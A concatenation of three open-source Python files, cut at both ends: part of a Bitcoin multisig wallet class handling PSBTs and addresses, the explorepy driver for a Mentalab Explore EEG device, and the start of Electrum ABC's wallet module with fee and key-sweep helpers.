self.cli.lockunspent(True, self.pending_psbts[txid]["tx"]["vin"])
except:
# UTXO was spent
pass
if txid in self.pending_psbts:
del self.pending_psbts[txid]
self.save_to_file()
def update_pending_psbt(self, psbt, txid, raw):
if txid in self.pending_psbts:
self.pending_psbts[txid]["base64"] = psbt
decodedpsbt = self.cli.decodepsbt(psbt)
signed_devices = self.get_signed_devices(decodedpsbt)
self.pending_psbts[txid]["devices_signed"] = [dev.name for dev in signed_devices]
if "hex" in raw:
self.pending_psbts[txid]["sigs_count"] = self.sigs_required
self.pending_psbts[txid]["raw"] = raw["hex"]
else:
self.pending_psbts[txid]["sigs_count"] = len(signed_devices)
self.save_to_file()
return self.pending_psbts[txid]
else:
raise SpecterError("Can't find pending PSBT with this txid")
def save_pending_psbt(self, psbt):
self.pending_psbts[psbt["tx"]["txid"]] = psbt
self.cli.lockunspent(False, psbt["tx"]["vin"])
self.save_to_file()
def txlist(self, idx, wallet_tx_batch=100):
try:
cli_txs = self.cli.listtransactions("*", wallet_tx_batch + 2, wallet_tx_batch * idx, True) # get batch + 2 to make sure you have information about send
cli_txs.reverse()
transactions = cli_txs[:wallet_tx_batch]
except:
return []
txids = []
result = []
for tx in transactions:
if 'confirmations' not in tx:
tx['confirmations'] = 0
if len([_tx for _tx in cli_txs if (_tx['txid'] == tx['txid'] and _tx['address'] == tx['address'])]) > 1:
continue # means the tx is duplicated (change), continue
txids.append(tx["txid"])
result.append(tx)
return result
def rescanutxo(self):
t = threading.Thread(target=self._rescan_utxo_thread)
t.start()
def _rescan_utxo_thread(self):
args = [
"start",
[{
"desc": self.recv_descriptor,
"range": self.keypool
},{
"desc": self.change_descriptor,
"range": self.change_keypool
}]
]
unspents = self.cli.scantxoutset(*args)["unspents"]
res = self.cli.multi([
("getblockhash", tx["height"])
for tx in unspents
])
block_hashes = [r["result"] for r in res]
for i, tx in enumerate(unspents):
tx["blockhash"] = block_hashes[i]
res = self.cli.multi([
("gettxoutproof", [tx["txid"]], tx["blockhash"])
for tx in unspents
])
proofs = [r["result"] for r in res]
for i, tx in enumerate(unspents):
tx["proof"] = proofs[i]
res = self.cli.multi([
("getrawtransaction", tx["txid"], False, tx["blockhash"])
for tx in unspents
])
raws = [r["result"] for r in res]
for i, tx in enumerate(unspents):
tx["raw"] = raws[i]
self.cli.multi([
("importprunedfunds", tx["raw"], tx["proof"])
for tx in unspents
])
@property
def rescan_progress(self):
"""Returns None if rescanblockchain is not launched,
value between 0 and 1 otherwise
"""
if self.info is {} or "scanning" not in self.info or self.info["scanning"] == False:
return None
else:
return self.info["scanning"]["progress"]
@property
def blockheight(self):
txs = self.cli.listtransactions("*", 100, 0, True)
i = 0
while (len(txs) == 100):
i += 1
next_txs = self.cli.listtransactions("*", 100, i * 100, True)
if (len(next_txs) > 0):
txs = next_txs
else:
break
current_blockheight = self.cli.getblockcount()
if len(txs) > 0 and 'confirmations' in txs[0]:
blockheight = current_blockheight - txs[0]['confirmations'] - 101 # To ensure coinbase transactions are indexed properly
return 0 if blockheight < 0 else blockheight # To ensure regtest don't have negative blockheight
return current_blockheight
@property
def account_map(self):
return '{ "label": "' + self.name + '", "blockheight": ' + str(self.blockheight) + ', "descriptor": "' + self.recv_descriptor.replace("/", "\\/") + '" }'
def getnewaddress(self, change=False):
label = "Change" if change else "Address"
if change:
self.change_index += 1
index = self.change_index
else:
self.address_index += 1
index = self.address_index
address = self.get_address(index, change=change)
self.setlabel(address, "{} #{}".format(label, index))
if change:
self.change_address = address
else:
self.address = address
self.save_to_file()
return address
def get_address(self, index, change=False):
pool = self.change_keypool if change else self.keypool
if pool < index + WALLET_CHUNK:
self.keypoolrefill(pool, index + WALLET_CHUNK, change=change)
desc = self.change_descriptor if change else self.recv_descriptor
if self.is_multisig:
try:
# first try with sortedmulti
addr = self.cli.deriveaddresses(desc, [index, index+1])[0]
except:
# if sortedmulti is not supported
desc = sort_descriptor(self.cli, desc, index=index, change=change)
addr = self.cli.deriveaddresses(desc)[0]
return addr
return self.cli.deriveaddresses(desc, [index, index + 1])[0]
def get_balance(self):
try:
self.balance = self.cli.getbalances()["watchonly"]
except:
self.balance = { "trusted": 0, "untrusted_pending": 0 }
return self.balance
def keypoolrefill(self, start, end=None, change=False):
if end is None:
end = start + WALLET_CHUNK
desc = self.recv_descriptor if not change else self.change_descriptor
args = [
{
"desc": desc,
"internal": change,
"range": [start, end],
"timestamp": "now",
"keypool": True,
"watchonly": True
}
]
if not self.is_multisig:
r = self.cli.importmulti(args, {"rescan": False})
# bip67 requires sorted public keys for multisig addresses
else:
# try if sortedmulti is supported
r = self.cli.importmulti(args, {"rescan": False})
# doesn't raise, but instead returns "success": False
if not r[0]['success']:
# first import normal multi
# remove checksum
desc = desc.split("#")[0]
# switch to multi
desc = desc.replace("sortedmulti", "multi")
# add checksum
desc = AddChecksum(desc)
# update descriptor
args[0]["desc"] = desc
r = self.cli.importmulti(args, {"rescan": False})
# make a batch of single addresses to import
arg = args[0]
# remove range key
arg.pop("range")
batch = []
for i in range(start, end):
sorted_desc = sort_descriptor(
self.cli,
desc,
index=i,
change=change
)
# create fresh object
obj = {}
obj.update(arg)
obj.update({"desc": sorted_desc})
batch.append(obj)
r = self.cli.importmulti(batch, {"rescan": False})
if change:
self.change_keypool = end
else:
self.keypool = end
self.save_to_file()
return end
def utxo_on_address(self, address):
utxo = [tx for tx in self.utxo if tx["address"] == address]
return len(utxo)
def balance_on_address(self, address):
balancelist = [utxo["amount"] for utxo in self.utxo if utxo["address"] == address]
return sum(balancelist)
def utxo_on_label(self, label):
utxo = [tx for tx in self.utxo if self.getlabel(tx["address"]) == label]
return len(utxo)
def balance_on_label(self, label):
balancelist = [utxo["amount"] for utxo in self.utxo if self.getlabel(utxo["address"]) == label]
return sum(balancelist)
def addresses_on_label(self, label):
return list(dict.fromkeys(
[address for address in (self.addresses + self.change_addresses) if self.getlabel(address) == label]
))
@property
def is_current_address_used(self):
return self.balance_on_address(self.address) > 0
@property
def utxo_addresses(self):
return list(dict.fromkeys([utxo["address"] for utxo in sorted(self.utxo, key = lambda utxo: utxo["time"])]))
@property
def utxo_labels(self):
return list(dict.fromkeys([self.getlabel(utxo["address"]) for utxo in sorted(self.utxo, key = lambda utxo: utxo["time"])]))
def setlabel(self, address, label):
self.cli.setlabel(address, label)
def getlabel(self, address):
address_info = self.cli.getaddressinfo(address)
# Bitcoin Core version 0.20.0 has replaced the `label` field with `labels`, an array currently limited to a single item.
label = address_info["labels"][0] if (
"labels" in address_info
and (isinstance(address_info["labels"], list)
and len(address_info["labels"]) > 0)
and "label" not in address_info) else address
if label == "":
label = address
return address_info["label"] if "label" in address_info and address_info["label"] != "" else label
def get_address_name(self, address, addr_idx):
if self.getlabel(address) == address and addr_idx > -1:
self.setlabel(address, "Address #{}".format(addr_idx))
return self.getlabel(address)
@property
def fullbalance(self):
balance = self.balance
return balance["trusted"] + balance["untrusted_pending"]
@property
def available_balance(self):
locked_utxo = self.cli.listlockunspent()
# copy
balance = {}
balance.update(self.balance)
for tx in locked_utxo:
tx_data = self.cli.gettransaction(tx["txid"])
raw_tx = self.cli.decoderawtransaction(tx_data["hex"])
if "confirmations" not in tx_data or tx_data["confirmations"] == 0:
balance["untrusted_pending"] -= raw_tx["vout"][tx["vout"]]["value"]
else:
balance["trusted"] -= raw_tx["vout"][tx["vout"]]["value"]
return balance
@property
def full_available_balance(self):
balance = self.available_balance
return balance["trusted"] + balance["untrusted_pending"]
@property
def addresses(self):
return [self.get_address(idx) for idx in range(0, self.address_index + 1)]
@property
def active_addresses(self):
return list(dict.fromkeys(self.addresses + self.utxo_addresses))
@property
def change_addresses(self):
return [self.get_address(idx, change=True) for idx in range(0, self.change_index + 1)]
@property
def wallet_addresses(self):
return self.addresses + self.change_addresses
@property
def labels(self):
return list(dict.fromkeys([self.getlabel(addr) for addr in self.active_addresses]))
def createpsbt(self, addresses:[str], amounts:[float], subtract:bool=False, fee_rate:float=0.0, fee_unit="SAT_B", selected_coins=[]):
"""
fee_rate: in sat/B or BTC/kB. Default (None) bitcoin core sets feeRate automatically.
"""
if self.full_available_balance < sum(amounts):
raise SpecterError('The wallet does not have sufficient funds to make the transaction.')
if fee_unit not in ["SAT_B", "BTC_KB"]:
raise ValueError('Invalid bitcoin unit')
extra_inputs = []
if self.available_balance["trusted"] < sum(amounts):
txlist = self.cli.listunspent(0, 0)
b = sum(amounts) - self.available_balance["trusted"]
for tx in txlist:
extra_inputs.append({"txid": tx["txid"], "vout": tx["vout"]})
b -= tx["amount"]
if b < 0:
break
elif selected_coins != []:
still_needed = sum(amounts)
for coin in selected_coins:
coin_txid = coin.split(",")[0]
coin_vout = int(coin.split(",")[1])
coin_amount = float(coin.split(",")[2])
extra_inputs.append({"txid": coin_txid, "vout": coin_vout})
still_needed -= coin_amount
if still_needed < 0:
break
if still_needed > 0:
raise SpecterError("Selected coins does not cover Full amount! Please select more coins!")
# subtract fee from amount of this output:
# currently only one address is supported, so either
# empty array (subtract from change) or [0]
subtract_arr = [0] if subtract else []
options = {
"includeWatching": True,
"changeAddress": self.change_address,
"subtractFeeFromOutputs": subtract_arr
}
self.setlabel(self.change_address, "Change #{}".format(self.change_index))
if fee_rate > 0.0 and fee_unit == "SAT_B":
# bitcoin core needs us to convert sat/B to BTC/kB
options["feeRate"] = fee_rate / 10 ** 8 * 1024
# don't reuse change addresses - use getrawchangeaddress instead
r = self.cli.walletcreatefundedpsbt(
extra_inputs, # inputs
[{addresses[i]: amounts[i]} for i in range(len(addresses))], # output
0, # locktime
options, # options
True # replaceable
)
b64psbt = r["psbt"]
psbt = self.cli.decodepsbt(b64psbt)
psbt['base64'] = b64psbt
psbt["amount"] = amounts
psbt["address"] = addresses
psbt["time"] = time()
psbt["sigs_count"] = 0
self.save_pending_psbt(psbt)
return psbt
def fill_psbt(self, b64psbt, non_witness:bool=True, xpubs:bool=True):
psbt = PSBT()
psbt.deserialize(b64psbt)
if non_witness:
for i, inp in enumerate(psbt.tx.vin):
txid = inp.prevout.hash.to_bytes(32,'big').hex()
try:
res = self.cli.gettransaction(txid)
except:
raise SpecterError("Can't find previous transaction in the wallet.")
stream = BytesIO(bytes.fromhex(res["hex"]))
prevtx = CTransaction()
prevtx.deserialize(stream)
psbt.inputs[i].non_witness_utxo = prevtx
if xpubs:
# for multisig add xpub fields
if len(self.keys) > 1:
for k in self.keys:
key = b'\x01' + decode_base58(k.xpub)
if k.fingerprint != '':
fingerprint = bytes.fromhex(k.fingerprint)
else:
fingerprint = get_xpub_fingerprint(k.xpub)
if k.derivation != '':
der = der_to_bytes(k.derivation)
else:
der = b''
value = fingerprint + der
psbt.unknown[key] = value
return psbt.serialize()
def get_signed_devices(self, decodedpsbt):
signed_devices = []
# check who already signed
for i, key in enumerate(self.keys):
sigs = 0
for inp in decodedpsbt["inputs"]:
if "bip32_derivs" not in inp:
# how are we going to sign it???
break
if "partial_signatures" not in inp:
# nothing to update - no signatures for this input
break
for der in inp["bip32_derivs"]:
if der["master_fingerprint"] == key.fingerprint:
if der["pubkey"] in inp["partial_signatures"]:
sigs += 1
# ok we have all signatures from this key (device)
if sigs >= len(decodedpsbt["inputs"]):
# assuming that order of self.devices and self.keys is the same
signed_devices.append(self.devices[i])
return signed_devices
def importpsbt(self, b64psbt):
# TODO: check maybe some of the inputs are already locked
psbt = self.cli.decodepsbt(b64psbt)
psbt['base64'] = b64psbt
amount = 0
address = None
# get output address and amount
for out in psbt["tx"]["vout"]:
if "addresses" not in out["scriptPubKey"] or len(out["scriptPubKey"]["addresses"]) == 0:
# TODO: we need to handle it somehow differently
raise SpecterError("Sending to raw scripts is not supported yet")
addr = out["scriptPubKey"]["addresses"][0]
info = self.cli.getaddressinfo(addr)
# check if it's a change
if info["iswatchonly"] or info["ismine"]:
continue
# if not - this is out address
# ups, more than one sending address
if address is not None:
# TODO: we need to have multiple address support
raise SpecterError("Sending to multiple addresses is not supported yet")
address = addr
amount += out["value"]
# detect signatures
signed_devices = self.get_signed_devices(psbt)
psbt["devices_signed"] = [dev.name for dev in signed_devices]
psbt["amount"] = amount
psbt["address"] = address
psbt["time"] = time()
psbt["sigs_count"] = len(signed_devices)
raw = self.cli.finalizepsbt(b64psbt)
if "hex" in raw:
psbt["raw"] = raw["hex"]
self.save_pending_psbt(psbt)
return psbt
|
explore.py
|
# -*- coding: utf-8 -*-
from explorepy.bt_client import BtClient
from explorepy.parser import Parser
from explorepy.dashboard.dashboard import Dashboard
from explorepy._exceptions import *
from explorepy.packet import CommandRCV, CommandStatus, CalibrationInfo, DeviceInfo
from explorepy.tools import FileRecorder
import csv
import os
import time
import signal
import sys
from pylsl import StreamInfo, StreamOutlet
from threading import Thread, Timer
class Explore:
r"""Mentalab Explore device"""
def __init__(self, n_device=1, calibre_file=None):
r"""
Args:
n_device (int): Number of devices to be connected
calibre_file (str): Calibration data file name
"""
self.device = []
self.socket = None
self.parser = None
self.m_dashboard = None
for i in range(n_device):
self.device.append(BtClient())
self.is_connected = False
self.is_acquiring = None
self.calibration_file = calibre_file
def connect(self, device_name=None, device_addr=None, device_id=0):
r"""
Connects to the nearby device. If there are more than one device, the user is asked to choose one of them.
Args:
device_name (str): Device name in the format of "Explore_XXXX"
device_addr (str): The MAC address in format "XX:XX:XX:XX:XX:XX" Either Address or name should be in the input
device_id (int): device id (not needed in the current version)
"""
self.device[device_id].init_bt(device_name=device_name, device_addr=device_addr)
if self.socket is None:
self.socket = self.device[device_id].bt_connect()
if self.parser is None:
self.parser = Parser(socket=self.socket, calibration_file=self.calibration_file)
self.is_connected = True
packet = None
def disconnect(self, device_id=None):
r"""Disconnects from the device
Args:
device_id (int): device id (not needed in the current version)
"""
self.device[device_id].socket.close()
self.is_connected = False
def acquire(self, device_id=0, duration=None):
r"""Start getting data from the device
Args:
device_id (int): device id (not needed in the current version)
duration (float): duration of acquiring data (if None it streams data endlessly)
"""
assert self.is_connected, "Explore device is not connected. Please connect the device first."
is_acquiring = [True]
def stop_acquiring(flag):
flag[0] = False
if duration is not None:
Timer(duration, stop_acquiring, [is_acquiring]).start()
print("Start acquisition for ", duration, " seconds...")
while is_acquiring[0]:
try:
self.parser.parse_packet(mode="print")
except ConnectionAbortedError:
print("Device has been disconnected! Scanning for last connected device...")
try:
self.parser.socket = self.device[device_id].bt_connect()
except DeviceNotFoundError as e:
print(e)
return 0
print("Data acquisition stopped after ", duration, " seconds.")
def record_data(self, file_name, do_overwrite=False, device_id=0, duration=None, file_type='csv'):
r"""Records the data in real-time
Args:
file_name (str): Output file name
device_id (int): Device id (not needed in the current version)
do_overwrite (bool): Overwrite if files exist already
duration (float): Duration of recording in seconds (if None records endlessly).
file_type (str): File type of the recorded file. Supported file types: 'csv', 'edf'
"""
assert self.is_connected, "Explore device is not connected. Please connect the device first."
# Check invalid characters
if set(r'<>{}[]~`*%').intersection(file_name):
raise ValueError("Invalid character in file name")
n_chan = self.parser.n_chan
if file_type not in ['edf', 'csv']:
raise ValueError('{} is not a supported file extension!'.format(file_type))
time_offset = None
exg_out_file = file_name + "_ExG"
orn_out_file = file_name + "_ORN"
marker_out_file = file_name + "_Marker"
exg_ch = ['TimeStamp', 'ch1', 'ch2', 'ch3', 'ch4', 'ch5', 'ch6', 'ch7', 'ch8'][0:n_chan+1]
exg_unit = ['s', 'V', 'V', 'V', 'V', 'V', 'V', 'V', 'V'][0:n_chan+1]
exg_max = [86400, .4, .4, .4, .4, .4, .4, .4, .4][0:n_chan + 1]
exg_min = [0, -.4, -.4, -.4, -.4, -.4, -.4, -.4, -.4][0:n_chan + 1]
exg_recorder = FileRecorder(file_name=exg_out_file, ch_label=exg_ch, fs=self.parser.fs, ch_unit=exg_unit,
file_type=file_type, do_overwrite=do_overwrite, ch_min=exg_min, ch_max=exg_max)
orn_ch = ['TimeStamp', 'ax', 'ay', 'az', 'gx', 'gy', 'gz', 'mx', 'my', 'mz']
orn_unit = ['s', 'mg', 'mg', 'mg', 'mdps', 'mdps', 'mdps', 'mgauss', 'mgauss', 'mgauss']
orn_max = [86400, 2000, 2000, 2000, 250000, 250000, 250000, 50000, 50000, 50000]
orn_min = [0, -2000, -2000, -2000, -250000, -250000, -250000, -50000, -50000, -50000]
orn_recorder = FileRecorder(file_name=orn_out_file, ch_label=orn_ch, fs=20,
ch_unit=orn_unit, file_type=file_type, do_overwrite=do_overwrite,
ch_min=orn_min, ch_max=orn_max)
if file_type == 'csv':
marker_ch = ['TimeStamp', 'Code']
marker_unit = ['s', '-']
marker_recorder = FileRecorder(file_name=marker_out_file, ch_label=marker_ch, fs=0,
ch_unit=marker_unit, file_type=file_type, do_overwrite=do_overwrite)
elif file_type == 'edf':
marker_recorder = exg_recorder
is_acquiring = [True]
def stop_acquiring(flag):
flag[0] = False
if duration is not None:
if duration <= 0:
raise ValueError("Recording time must be a positive number!")
rec_timer = Timer(duration, stop_acquiring, [is_acquiring])
rec_timer.start()
print("Start recording for ", duration, " seconds...")
else:
print("Recording...")
is_disconnect_occurred = False
while is_acquiring[0]:
try:
packet = self.parser.parse_packet(mode="record", recorders=(exg_recorder, orn_recorder, marker_recorder))
if time_offset is not None:
packet.timestamp = packet.timestamp-time_offset
else:
time_offset = packet.timestamp
except ConnectionAbortedError:
print("Device has been disconnected! Scanning for last connected device...")
try:
self.parser.socket = self.device[device_id].bt_connect()
except DeviceNotFoundError as e:
print(e)
rec_timer.cancel()
return 0
if is_disconnect_occurred:
print("Error: Recording finished before ", duration, "seconds.")
rec_timer.cancel()
else:
print("Recording finished after ", duration, " seconds.")
exg_recorder.stop()
orn_recorder.stop()
if file_type == 'csv':
marker_recorder.stop()
def push2lsl(self, device_id=0, duration=None):
r"""Push samples to two lsl streams
Args:
device_id (int): device id (not needed in the current version)
duration (float): duration of data acquiring (if None it streams endlessly).
"""
assert self.is_connected, "Explore device is not connected. Please connect the device first."
info_orn = StreamInfo('Explore', 'Orientation', 13, 20, 'float32', 'ORN')
info_exg = StreamInfo('Explore', 'ExG', self.parser.n_chan, self.parser.fs, 'float32', 'ExG')
info_marker = StreamInfo('Explore', 'Markers', 1, 0, 'int32', 'Marker')
orn_outlet = StreamOutlet(info_orn)
exg_outlet = StreamOutlet(info_exg)
marker_outlet = StreamOutlet(info_marker)
is_acquiring = [True]
def stop_acquiring(flag):
flag[0] = False
if duration is not None:
Timer(duration, stop_acquiring, [is_acquiring]).start()
print("Start pushing to lsl for ", duration, " seconds...")
else:
print("Pushing to lsl...")
while is_acquiring[0]:
try:
self.parser.parse_packet(mode="lsl", outlets=(orn_outlet, exg_outlet, marker_outlet))
except ConnectionAbortedError:
print("Device has been disconnected! Scanning for last connected device...")
try:
self.parser.socket = self.device[device_id].bt_connect()
except DeviceNotFoundError as e:
print(e)
return 0
print("Data acquisition finished after ", duration, " seconds.")
def visualize(self, device_id=0, bp_freq=(1, 30), notch_freq=50, calibre_file=None):
r"""Visualization of the signal in the dashboard
Args:
device_id (int): Device ID (not needed in the current version)
bp_freq (tuple): Bandpass filter cut-off frequencies (low_cutoff_freq, high_cutoff_freq), No bandpass filter
if it is None.
notch_freq (int): Line frequency for notch filter (50 or 60 Hz), No notch filter if it is None
"""
assert self.is_connected, "Explore device is not connected. Please connect the device first."
self.parser.notch_freq = notch_freq
if bp_freq is not None:
self.parser.apply_bp_filter = True
self.parser.bp_freq = bp_freq
self.m_dashboard = Dashboard(n_chan=self.parser.n_chan,
exg_fs=self.parser.fs,
firmware_version=self.parser.firmware_version)
self.m_dashboard.start_server()
thread = Thread(target=self._io_loop)
thread.setDaemon(True)
thread.start()
self.m_dashboard.start_loop()
def _io_loop(self, device_id=0, mode="visualize"):
self.is_acquiring = [True]
# Wait until dashboard is initialized.
while not hasattr(self.m_dashboard, 'doc'):
print('wait...')
time.sleep(.5)
while self.is_acquiring[0]:
try:
packet = self.parser.parse_packet(mode=mode, dashboard=self.m_dashboard)
except ConnectionAbortedError:
print("Device has been disconnected! Scanning for last connected device...")
try:
self.parser.socket = self.device[device_id].bt_connect()
except DeviceNotFoundError as e:
print(e)
self.is_acquiring[0] = False
if mode == "visualize":
os._exit(0)
os.exit(0)
def signal_handler(self, signal, frame):
# Safe handler of keyboardInterrupt
self.is_acquiring = [False]
print("Program is exiting...")
sys.exit(0)
def measure_imp(self, device_id=0, notch_freq=50):
"""
Visualization of the electrode impedances
Args:
device_id (int): Device ID
notch_freq (int): Notch frequency for filtering the line noise (50 or 60 Hz)
"""
assert self.is_connected, "Explore device is not connected. Please connect the device first."
assert self.parser.fs == 250, "Impedance mode only works in 250 Hz sampling rate!"
self.is_acquiring = [True]
signal.signal(signal.SIGINT, self.signal_handler)
try:
thread = Thread(target=self._io_loop, args=(device_id, "impedance",))
thread.setDaemon(True)
self.parser.apply_bp_filter = True
self.parser.bp_freq = (61, 64)
self.parser.notch_freq = notch_freq
thread.start()
# Activate impedance measurement mode in the device
from explorepy import command
imp_activate_cmd = command.ZmeasurementEnable()
if self.change_settings(imp_activate_cmd):
self.m_dashboard = Dashboard(n_chan=self.parser.n_chan, mode="impedance", exg_fs=self.parser.fs,
firmware_version=self.parser.firmware_version)
self.m_dashboard.start_server()
self.m_dashboard.start_loop()
else:
os._exit(0)
finally:
print("Disabling impedance mode...")
from explorepy import command
imp_deactivate_cmd = command.ZmeasurementDisable()
self.change_settings(imp_deactivate_cmd)
sys.exit(0)
def set_marker(self, code):
"""Sets an event marker during the recording
Args:
code (int): Marker code. It must be an integer larger than 7 (codes from 0 to 7 are reserved for hardware markers).
"""
assert self.is_connected, "Explore device is not connected. Please connect the device first."
self.parser.set_marker(marker_code=code)
def change_settings(self, command, device_id=0):
"""
sends a message to the device
Args:
device_id (int): Device ID
command (explorepy.command.Command): Command object
Returns:
"""
from explorepy.command import send_command
assert self.is_connected, "Explore device is not connected. Please connect the device first."
sending_attempt = 5
while sending_attempt:
try:
sending_attempt = sending_attempt-1
time.sleep(0.1)
send_command(command, self.socket)
sending_attempt = 0
except ConnectionAbortedError:
print("Device has been disconnected! Scanning for last connected device...")
try:
self.parser.socket = self.device[device_id].bt_connect()
except DeviceNotFoundError as e:
print(e)
return 0
is_listening = [True]
command_processed = False
def stop_listening(flag):
flag[0] = False
waiting_time = 10
command_timer = Timer(waiting_time, stop_listening, [is_listening])
command_timer.start()
print("waiting for ack and status messages...")
while is_listening[0]:
try:
packet = self.parser.parse_packet(mode="listen")
if isinstance(packet, CommandRCV):
temp = command.int2bytearray(packet.opcode, 1)
if command.int2bytearray(packet.opcode, 1) == command.opcode.value:
print("The opcode matches the sent command, Explore has received the command")
if isinstance(packet, CalibrationInfo):
self.parser.imp_calib_info['slope'] = packet.slope
self.parser.imp_calib_info['offset'] = packet.offset
if isinstance(packet, CommandStatus):
if command.int2bytearray(packet.opcode, 1) == command.opcode.value:
command_processed = True
is_listening = [False]
command_timer.cancel()
print("The opcode matches the sent command, Explore has processed the command")
return True
except ConnectionAbortedError:
print("Device has been disconnected! Scanning for last connected device...")
try:
self.parser.socket = self.device[device_id].bt_connect()
except DeviceNotFoundError as e:
print(e)
return 0
if not command_processed:
print("No status message has been received after ", waiting_time, " seconds. Please restart the device and "
"send the command again.")
return False
def calibrate_orn(self, file_name, device_id=0, do_overwrite=False):
r"""Calibrate the orientation module of the specified device
Args:
device_id (int): device id
file_name (str): filename to be used for calibration. If you pass this parameter, ORN module should be ACTIVE!
do_overwrite (bool): Overwrite if files exist already
"""
print("Start recording for 100 seconds, please move the device around during this time, in all directions")
self.record_data(file_name, do_overwrite=do_overwrite, device_id=device_id, duration=100, file_type='csv')
calibre_out_file = file_name + "_calibre_coef.csv"
assert not (os.path.isfile(calibre_out_file) and do_overwrite), calibre_out_file + " already exists!"
import numpy as np
with open((file_name + "_ORN.csv"), "r") as f_set, open(calibre_out_file, "w") as f_coef:
f_coef.write("kx, ky, kz, mx_offset, my_offset, mz_offset\n")
csv_reader = csv.reader(f_set, delimiter=",")
csv_coef = csv.writer(f_coef, delimiter=",")
np_set = list(csv_reader)
np_set = np.array(np_set[1:], dtype=np.float)
mag_set_x = np.sort(np_set[:, -3])
mag_set_y = np.sort(np_set[:, -2])
mag_set_z = np.sort(np_set[:, -1])
mx_offset = 0.5 * (mag_set_x[0] + mag_set_x[-1])
my_offset = 0.5 * (mag_set_y[0] + mag_set_y[-1])
mz_offset = 0.5 * (mag_set_z[0] + mag_set_z[-1])
kx = 0.5 * (mag_set_x[-1] - mag_set_x[0])
ky = 0.5 * (mag_set_y[-1] - mag_set_y[0])
kz = 0.5 * (mag_set_z[-1] - mag_set_z[0])
k = np.sort(np.array([kx, ky, kz]))
kx = 1 / kx
ky = 1 / ky
kz = 1 / kz
calibre_set = np.array([kx, ky, kz, mx_offset, my_offset, mz_offset])
csv_coef.writerow(calibre_set)
f_set.close()
f_coef.close()
os.remove((file_name + "_ORN.csv"))
os.remove((file_name + "_ExG.csv"))
os.remove((file_name + "_Marker.csv"))
if __name__ == '__main__':
pass
|
wallet.py
|
# Electrum ABC - lightweight eCash client
# Copyright (C) 2020 The Electrum ABC developers
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Wallet classes:
# - ImportedAddressWallet: imported address, no keystore
# - ImportedPrivkeyWallet: imported private keys, keystore
# - Standard_Wallet: one keystore, P2PKH
# - Multisig_Wallet: several keystores, P2SH
import copy
import errno
import json
import itertools
import os
import queue
import random
import threading
import time
from collections import defaultdict, namedtuple
from enum import Enum, auto
from typing import Set, Tuple, Union
from .i18n import ngettext
from .util import (NotEnoughFunds, ExcessiveFee, PrintError,
UserCancelled, InvalidPassword, profiler,
format_satoshis, format_time, finalization_print_error,
to_string, bh2u, TimeoutException)
from .address import Address, Script, ScriptOutput, PublicKey
from .version import PACKAGE_VERSION
from .keystore import load_keystore, Hardware_KeyStore, Imported_KeyStore, BIP32_KeyStore, xpubkey_to_address
from . import mnemo
from . import networks
from . import keystore
from .storage import multisig_type, WalletStorage
from .transaction import Transaction, InputValueMissing
from .plugins import run_hook
from . import bitcoin
from . import coinchooser
from .synchronizer import Synchronizer
from .verifier import SPV, SPVDelegate
from . import schnorr
from . import ecc_fast
from .blockchain import NULL_HASH_HEX
from . import paymentrequest
from .paymentrequest import InvoiceStore, PR_PAID, PR_UNPAID, PR_UNKNOWN, PR_EXPIRED
from .contacts import Contacts
from . import cashacct
from . import slp
from .i18n import _
DEFAULT_CONFIRMED_ONLY = False
def relayfee(network):
RELAY_FEE = 5000
MAX_RELAY_FEE = 50000
f = network.relay_fee if network and network.relay_fee else RELAY_FEE
return min(f, MAX_RELAY_FEE)
def dust_threshold(network):
# Change < dust threshold is added to the tx fee
#return 182 * 3 * relayfee(network) / 1000 # original Electrum logic
#return 1 # <-- was this value until late Sept. 2018
return 546 # hard-coded Bitcoin Cash dust threshold. Was changed to this as of Sept. 2018
def sweep_preparations(privkeys, network, imax=100):
class InputsMaxxed(Exception):
pass
def append_utxos_to_inputs(inputs, pubkey, txin_type):
if txin_type == 'p2pkh':
address = Address.from_pubkey(pubkey)
else:
address = PublicKey.from_pubkey(pubkey)
sh = address.to_scripthash_hex()
u = network.synchronous_get(('blockchain.scripthash.listunspent', [sh]))
for item in u:
if len(inputs) >= imax:
raise InputsMaxxed()
item['address'] = address
item['type'] = txin_type
item['prevout_hash'] = item['tx_hash']
item['prevout_n'] = item['tx_pos']
item['pubkeys'] = [pubkey]
item['x_pubkeys'] = [pubkey]
item['signatures'] = [None]
item['num_sig'] = 1
inputs.append(item)
def find_utxos_for_privkey(txin_type, privkey, compressed):
pubkey = bitcoin.public_key_from_private_key(privkey, compressed)
append_utxos_to_inputs(inputs, pubkey, txin_type)
keypairs[pubkey] = privkey, compressed
inputs = []
keypairs = {}
try:
for sec in privkeys:
txin_type, privkey, compressed = bitcoin.deserialize_privkey(sec)
find_utxos_for_privkey(txin_type, privkey, compressed)
# do other lookups to increase support coverage
if bitcoin.is_minikey(sec):
# minikeys don't have a compressed byte
# we lookup both compressed and uncompressed pubkeys
find_utxos_for_privkey(txin_type, privkey, not compressed)
elif txin_type == 'p2pkh':
# WIF serialization does not distinguish p2pkh and p2pk
# we also search for pay-to-pubkey outputs
find_utxos_for_privkey('p2pk', privkey, compressed)
elif txin_type == 'p2sh':
raise ValueError(_("The specified WIF key '{}' is a p2sh WIF key. These key types cannot be swept.").format(sec))
except InputsMaxxed:
pass
if not inputs:
raise ValueError(_('No inputs found. (Note that inputs need to be confirmed)'))
return inputs, keypairs
def sweep(privkeys, network, config, recipient, fee=None, imax=100, sign_schnorr=False):
inputs, keypairs = sweep_preparations(privkeys, network, imax)
total = sum(i.get('value') for i in inputs)
if fee is None:
outputs = [(bitcoin.TYPE_ADDRESS, recipient, total)]
